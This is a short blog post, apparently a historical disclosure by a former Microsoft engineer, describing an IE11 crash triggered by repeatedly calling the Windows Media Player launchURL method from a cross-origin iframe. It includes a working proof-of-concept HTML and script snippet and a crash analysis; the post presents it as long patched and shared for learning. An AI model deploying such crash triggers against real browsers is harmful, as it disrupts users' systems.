DoS: Windows Media Player launchURL from Cross-Origin iFrame

Calling the WMP launchURL method repeatedly from a cross-origin iFrame crashed IE11 with a null read in MSHTML!CElement::IsFullScreenAvailable. Classified PROBABLY_NOT_EXPLOITABLE, this appeared to be a regression of an older WMP bug.

<!-- iframe.html on a different domain -->
<object style="display:none" id="wmp" classid="clsid:6BF52A52-394A-11d3-B153-00C04F79FAA6"></object>

<script>
function crashMe()
{
	try
	{
		document.getElementById("wmp").launchURL('http://www.bing.com&&_top');
	}
	catch(e){}
}
</script>

The launchURL call used the &&_top trick to attempt navigation of the top-level window. When called at regular intervals from a cross-origin iFrame, the WMP ActiveX initiated a layout pass on elements in the parent document that lacked the context expected by CElement::IsFullScreenAvailable, resulting in a null dereference at +0x91.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.

Read other posts

< [Spoofing the Blocked Pop-up Origin via WebBrowser Navigate] :: [DoS: WMP Object Inside createPopup, Hidden Immediately] >